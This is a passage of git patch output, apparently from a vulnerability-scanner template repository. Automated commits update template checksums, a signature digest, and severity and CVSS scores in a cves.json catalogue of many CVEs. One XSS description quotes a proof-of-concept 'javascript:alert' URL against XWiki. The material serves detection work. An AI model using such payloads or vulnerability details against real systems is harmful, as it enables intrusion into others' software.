-http/cves/2024/CVE-2024-21683.yaml:4d37563c0e58c53b849999c96fafb1fe173b4ede -http/cves/2024/CVE-2024-21887.yaml:7ded7fecbf1bdede573928e97c3d48f1b6db2a17 -http/cves/2024/CVE-2024-21893.yaml:403d9491255a70d1fd5ae5b41ef554adf01888eb -http/cves/2024/CVE-2024-22024.yaml:d53fc0281004592753093a77fedd54322bc7526d -http/cves/2024/CVE-2024-22319.yaml:727a1cab59ca03b93d1e120f1768ccefd5bbeed4 +http/cves/2024/CVE-2024-1709.yaml:3978d9abbcba91bb6b6fe4cf6130cc35695bd1b8 +http/cves/2024/CVE-2024-20767.yaml:241fd099c8ac13ce65b6bc56f755be96783242a2 +http/cves/2024/CVE-2024-21644.yaml:77f0255102382e9e404d4054408803175ca19cf5 +http/cves/2024/CVE-2024-21645.yaml:767ebb9ae34a75ef4ea555762287fa63997897d1 +http/cves/2024/CVE-2024-21683.yaml:657419eac116dffe80bc62d4e4588a2168564b67 +http/cves/2024/CVE-2024-21887.yaml:4b36342fe050f53bc2ff1ac11ca13e95b404bad7 +http/cves/2024/CVE-2024-21893.yaml:599b798ebf591a068799a211d4764cacf0e7508f +http/cves/2024/CVE-2024-22024.yaml:9af28e0670ae9c74797592276bfaa6417776c078 +http/cves/2024/CVE-2024-22319.yaml:82399268f85f4057eb6c759cd2699c9005f15a3b http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb -http/cves/2024/CVE-2024-22927.yaml:7f2ddc59d05ee8143e928a3a0fdebe32fa8376a1 +http/cves/2024/CVE-2024-22927.yaml:9c87536b6f8b4467aac60188d0b0f3ceee471bc9 http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe -http/cves/2024/CVE-2024-2340.yaml:8b4e6176085fd2e23294d24fe4ad16623e6c04d2 +http/cves/2024/CVE-2024-2340.yaml:2b0b9e95cf442c8b162d18c5d337c05baac60b18 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 -http/cves/2024/CVE-2024-23917.yaml:30e3c4167ab654c921a0099ca71173f3aaa4efb6 -http/cves/2024/CVE-2024-24131.yaml:92521d7f06cc522caf757cf4955580a6ce81f11c -http/cves/2024/CVE-2024-24919.yaml:dc70da2422a62df9120e90019f4b177f82b9637a +http/cves/2024/CVE-2024-23917.yaml:da590499bc9e18895403a8cb81ea4c93bfbec9ef +http/cves/2024/CVE-2024-24131.yaml:48167253e7792f9b8917abc160391bde7497afff +http/cves/2024/CVE-2024-24919.yaml:59be299acfb1747ce7401170404292e788d0a822 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 -http/cves/2024/CVE-2024-25735.yaml:6cb37a640b41863066cfcc9d917f6da3bca178ef -http/cves/2024/CVE-2024-26331.yaml:09399db8fb7ac4ae716c9b1d7a25a73727288132 -http/cves/2024/CVE-2024-27198.yaml:ef5197d6f52235dfa22a237ec3ba7b1dfdaf5492 +http/cves/2024/CVE-2024-25735.yaml:e6bb34d06213eebd89b7290f8a32a2c43772f8b6 +http/cves/2024/CVE-2024-26331.yaml:717487e16279f4cd2d5666a4d83ab53f0475c4a2 +http/cves/2024/CVE-2024-27198.yaml:11820d1d61eb185078709185d0cda080414cb333 http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88 http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43 -http/cves/2024/CVE-2024-27956.yaml:183826f7991890e37661f393a43e76714418b327 -http/cves/2024/CVE-2024-28255.yaml:4e37fca1899d0664c6cc28b4d4ce66301db56ab2 -http/cves/2024/CVE-2024-28734.yaml:c947ad89f7a1c41c08be582fe05bfaf52e52784b +http/cves/2024/CVE-2024-27956.yaml:b6cecd7a2c5dd148c961bcacc9d6bc9075c9b90c +http/cves/2024/CVE-2024-28255.yaml:d7b149c542f2dba2d719e547ddc497ad029532e8 +http/cves/2024/CVE-2024-28734.yaml:282a40ba7cd7f653bfbc9f16397b9c6115ca18b1 http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b -http/cves/2024/CVE-2024-2879.yaml:1682b1027f2599bfed61d6922b4ad1e7af2963e7 -http/cves/2024/CVE-2024-29059.yaml:f36dad1af1afa0f510ee81e4cd653d23223988e8 -http/cves/2024/CVE-2024-29269.yaml:5a971a5e38e628cd7af595e83ff531ad9b912694 -http/cves/2024/CVE-2024-3097.yaml:061fb056a1993b992d863ec26cd78d368fe58473 -http/cves/2024/CVE-2024-3136.yaml:f41042c96e9dbb187c897bfb9b4fd4b0a82ca732 +http/cves/2024/CVE-2024-2879.yaml:8f4368955da161211eeaa0efc6bc9074fc1aeabb +http/cves/2024/CVE-2024-29059.yaml:8a60190e64510b3ac7fba68a3aced102feceb5c5 +http/cves/2024/CVE-2024-29269.yaml:b0c582055d752cae9d0837e9c4919e94c0fdf100 +http/cves/2024/CVE-2024-3097.yaml:8e86907f792754159cff9538655c090689d79784 +http/cves/2024/CVE-2024-3136.yaml:0bdd17ee8bfd01bba9b229c8ddfcdb53092dacf2 http/cves/2024/CVE-2024-31621.yaml:d0336b01545c56f67a5ee9a174f52e660861e3bc -http/cves/2024/CVE-2024-31848.yaml:784556c618c53d8d471b21fc04f3a040cc96f492 -http/cves/2024/CVE-2024-31849.yaml:d34bdd05da8c050a14fe72bb8dc7f54e45242250 -http/cves/2024/CVE-2024-31850.yaml:9ad703db727ec444a5579104f225275e1e626ddf +http/cves/2024/CVE-2024-31848.yaml:964b3ea6c30926284050eaca30c9aea8021784fc +http/cves/2024/CVE-2024-31849.yaml:0af61ea378a0dfbf2d49cdb29315b87731f95662 +http/cves/2024/CVE-2024-31850.yaml:7855c674a896328dd31f2980fa7e758cfca95847 http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf -http/cves/2024/CVE-2024-32399.yaml:e7baf7a6e22f175cc2f3b236ef68853cdf814506 +http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921 http/cves/2024/CVE-2024-32651.yaml:644d79d1e5be106386851b644d904c48a003d4b5 -http/cves/2024/CVE-2024-3273.yaml:14cd3a5d8b64e3e05dccebedbebc95045bcfdc2d +http/cves/2024/CVE-2024-3273.yaml:90b3bda22f55a43e5a3a59e482161317d6f26f36 http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab -http/cves/2024/CVE-2024-33575.yaml:cffffecf77c06ef57f987b130b2e8f28dd272b19 -http/cves/2024/CVE-2024-33724.yaml:620bb7553b4cef24c012f5a3a3655c0ee8146c78 -http/cves/2024/CVE-2024-3400.yaml:2bd600db500bb43b0afc7d7e694df41eeceb143f +http/cves/2024/CVE-2024-33575.yaml:3ab58da58f0076d6b593ca0ac312d8fc53a10f03 +http/cves/2024/CVE-2024-33724.yaml:54d8f232b79b426f6e06e8300b3fb141224f7ed2 +http/cves/2024/CVE-2024-3400.yaml:0d91cd0f3d285a63864754f7d2a0fcab4e54b7af http/cves/2024/CVE-2024-34470.yaml:a5518a2ed26dd99303e2e20f7356eece7f2dc927 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-3822.yaml:3b09a61773b3f696a26e7a152cfa5d1968aa9dc8 -http/cves/2024/CVE-2024-4040.yaml:0ec0a0dcbc9149db436ec147018574d574f45b25 -http/cves/2024/CVE-2024-4348.yaml:bbab477b0fd48166cf20c7a11b381830042bc34d +http/cves/2024/CVE-2024-4040.yaml:9470254ef11bec4f99022dac385a6198071a2cad +http/cves/2024/CVE-2024-4348.yaml:82d6d18aedb35323e1c359a8467f30ab49a8aae9 http/cves/2024/CVE-2024-4956.yaml:a00f92400517494320ec968d237c98bb1056de25 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 @@ -7899,7 +7899,7 @@ http/vulnerabilities/other/opencti-lfi.yaml:4436182554e2970f2129db430e2fede74a1a http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:4fb8f1900823a5ac074fca0719184c2727b46c37 http/vulnerabilities/other/openshift-log4j-rce.yaml:9981be094dfeb786c2526d931ebee412690d2b6b http/vulnerabilities/other/opensis-lfi.yaml:c1f5b90b135d401109243e355fc7a2eb6597a0a7 -http/vulnerabilities/other/opensns-rce.yaml:a3f0aee977fa0e7272db4920a6fee104c3dd46ec +http/vulnerabilities/other/opensns-rce.yaml:bb8e06d5e9d8cdd153b473fd8c28aeca186958b2 http/vulnerabilities/other/openvpn-hhi.yaml:3fcb3e167c4c7671807948d7d5268e6dd821f93c http/vulnerabilities/other/optilink-ont1gew-gpon-rce.yaml:58f9b71232e69f91b9ea83abdcb79394c40ae2f6 http/vulnerabilities/other/oracle-fatwire-lfi.yaml:ddecec2e84838ce0db6d8038c370dc2559c0eb62 @@ -8614,7 +8614,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6eb1cefac9f148d20991468437446ac844aca82d +templates-checksum.txt:40337c1eafe1c0e548003abfa4adba4c37c3ea8a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 281cd621616e5633dce085856b11a98f552f8260 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 09:07:19 +0000 Subject: [PATCH 1645/1768] Auto Template Signing [Sat Jun 1 09:07:19 UTC 2024] :robot: --- http/vulnerabilities/other/opensns-rce.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/vulnerabilities/other/opensns-rce.yaml b/http/vulnerabilities/other/opensns-rce.yaml index 24fa77d4b2..bdf0585c95 100644 --- a/http/vulnerabilities/other/opensns-rce.yaml +++ b/http/vulnerabilities/other/opensns-rce.yaml @@ -36,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210081f7cd7d5435b07de487b7d57d012fc8118f4adbee9062c7d803c6af555cb0e3022055309d98a0bbb07ed3c399389c8cac30c274abe8e95b58622aa913c9750d589c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008ed7eddc3dd192dd32c667a6630dcada4e3c410567407417370663b3a74f22b102206b0bcd9cbbb316ecf7faeed8237e696c985e465f3ab03796887fa815b182b308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b4fb3f63997fed2f1fe001ccc63afdc208136315 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 1 Jun 2024 09:32:18 +0000 Subject: [PATCH 1646/1768] Auto Generated cves.json [Sat Jun 1 09:32:18 UTC 2024] :robot: --- cves.json | 19 ++++++++++--------- cves.json-checksum.txt | 2 +- 2 files changed, 11 insertions(+), 10 deletions(-) diff --git a/cves.json b/cves.json index efb544a3c7..c65ce3d4eb 100644 --- a/cves.json +++ b/cves.json @@ -500,7 +500,7 @@ {"ID":"CVE-2018-10818","Info":{"Name":"LG NAS Devices - Remote Code Execution","Severity":"critical","Description":"LG NAS devices contain a pre-auth remote command injection via the \"password\" parameter.","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10818.yaml"} {"ID":"CVE-2018-10822","Info":{"Name":"D-Link Routers - Local File Inclusion","Severity":"high","Description":"D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after \"GET /uir\" in an HTTP request to the web interface.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10822.yaml"} {"ID":"CVE-2018-10823","Info":{"Name":"D-Link Routers - Remote Command Injection","Severity":"high","Description":"D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-10823.yaml"} -{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"} +{"ID":"CVE-2018-10942","Info":{"Name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","Severity":"critical","Description":"In the Attribute Wizard addon 1.6.9 for PrestaShop allows remote attackers to execute arbitrary code by uploading a php file.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-10942.yaml"} {"ID":"CVE-2018-10956","Info":{"Name":"IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion","Severity":"high","Description":"IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-10956.yaml"} {"ID":"CVE-2018-11227","Info":{"Name":"Monstra CMS \u003c=3.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-11227.yaml"} {"ID":"CVE-2018-11231","Info":{"Name":"Opencart Divido - Sql Injection","Severity":"high","Description":"OpenCart Divido plugin is susceptible to SQL injection\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-11231.yaml"} @@ -2017,7 +2017,7 @@ {"ID":"CVE-2023-1835","Info":{"Name":"Ninja Forms \u003c 3.6.22 - Cross-Site Scripting","Severity":"medium","Description":"Ninja Forms before 3.6.22 is susceptible to cross-site scripting via the page parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1835.yaml"} {"ID":"CVE-2023-1880","Info":{"Name":"Phpmyfaq v3.1.11 - Cross-Site Scripting","Severity":"medium","Description":"Phpmyfaq v3.1.11 is vulnerable to reflected XSS in send2friend because the 'artlang' parameter is not sanitized.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1880.yaml"} {"ID":"CVE-2023-1890","Info":{"Name":"Tablesome \u003c 1.0.9 - Cross-Site Scripting","Severity":"medium","Description":"Tablesome before 1.0.9 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-1890.yaml"} -{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"high","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} +{"ID":"CVE-2023-1892","Info":{"Name":"Sidekiq \u003c 7.0.8 - Cross-Site Scripting","Severity":"critical","Description":"An XSS vulnerability on a Sidekiq admin panel can pose serious risks to the security and functionality of the system.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-1892.yaml"} {"ID":"CVE-2023-20073","Info":{"Name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","Severity":"critical","Description":"A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-20073.yaml"} {"ID":"CVE-2023-2009","Info":{"Name":"Pretty Url \u003c= 1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"Plugin does not sanitize and escape the URL field in the plugin settings, which could allow high-privilege users to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2009.yaml"} {"ID":"CVE-2023-20198","Info":{"Name":"Cisco IOS XE - Authentication Bypass","Severity":"critical","Description":"Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.\nFor steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.\nCisco will provide updates on the status of this investigation and when a software patch is available.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-20198.yaml"} @@ -2158,7 +2158,7 @@ {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} -{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} +{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"medium","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"4.7"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} @@ -2176,7 +2176,7 @@ {"ID":"CVE-2023-3479","Info":{"Name":"Hestiacp \u003c= 1.7.7 - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3479.yaml"} {"ID":"CVE-2023-34843","Info":{"Name":"Traggo Server - Local File Inclusion","Severity":"high","Description":"traggo/server version 0.3.0 is vulnerable to directory traversal.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-34843.yaml"} {"ID":"CVE-2023-34960","Info":{"Name":"Chamilo Command Injection","Severity":"critical","Description":"A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34960.yaml"} -{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} +{"ID":"CVE-2023-34993","Info":{"Name":"Fortinet FortiWLM Unauthenticated Command Injection Vulnerability","Severity":"critical","Description":"A improper neutralization of special elements used in an os command ('os\ncommand injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and\n8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands\nSuccessful exploitation of this vulnerability could allow an attacker to\nbypass authentication and gain unauthorized access to the affected system.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34993.yaml"} {"ID":"CVE-2023-35078","Info":{"Name":"Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35078.yaml"} {"ID":"CVE-2023-35082","Info":{"Name":"MobileIron Core - Remote Unauthenticated API Access","Severity":"critical","Description":"Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35082.yaml"} {"ID":"CVE-2023-35158","Info":{"Name":"XWiki - Cross-Site Scripting","Severity":"medium","Description":"XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the restore template to perform a XSS, e.g. by using URL such as: \u003e /xwiki/bin/view/XWiki/Main?xpage=restore\u0026showBatch=true\u0026xredirect=javascript:alert(document.domain). This vulnerability exists since XWiki 9.4-rc-1. The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-35158.yaml"} @@ -2289,14 +2289,14 @@ {"ID":"CVE-2023-4596","Info":{"Name":"WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload","Severity":"critical","Description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4596.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-46347","Info":{"Name":"PrestaShop Step by Step products Pack - SQL Injection","Severity":"critical","Description":"In the module “Step by Step products Pack” (ndk_steppingpack) up to 1.5.6 from NDK Design for PrestaShop, a guest can perform SQL injection in affected versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46347.yaml"} -{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.6"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} +{"ID":"CVE-2023-46359","Info":{"Name":"cPH2 Charging Station v1.87.0 - OS Command Injection","Severity":"critical","Description":"An OS command injection vulnerability in Hardy Barth cPH2 Ladestation v1.87.0 and earlier, may allow an unauthenticated remote attacker to execute arbitrary commands on the system via a specifically crafted arguments passed to the connectivity check feature.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46359.yaml"} {"ID":"CVE-2023-46574","Info":{"Name":"TOTOLINK A3700R - Command Injection","Severity":"critical","Description":"An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46574.yaml"} {"ID":"CVE-2023-46747","Info":{"Name":"F5 BIG-IP - Unauthenticated RCE via AJP Smuggling","Severity":"critical","Description":"CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-46747.yaml"} {"ID":"CVE-2023-46805","Info":{"Name":"Ivanti ICS - Authentication Bypass","Severity":"high","Description":"An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2023/CVE-2023-46805.yaml"} {"ID":"CVE-2023-47115","Info":{"Name":"Label Studio - Cross-Site Scripting","Severity":"high","Description":"Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.\n","Classification":{"CVSSScore":"7.1"}},"file_path":"http/cves/2023/CVE-2023-47115.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} {"ID":"CVE-2023-47211","Info":{"Name":"ManageEngine OpManager - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2023/CVE-2023-47211.yaml"} -{"ID":"CVE-2023-47218","Info":{"Name":"QNAP QTS and QuTS Hero - OS Command Injection","Severity":"high","Description":"An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and 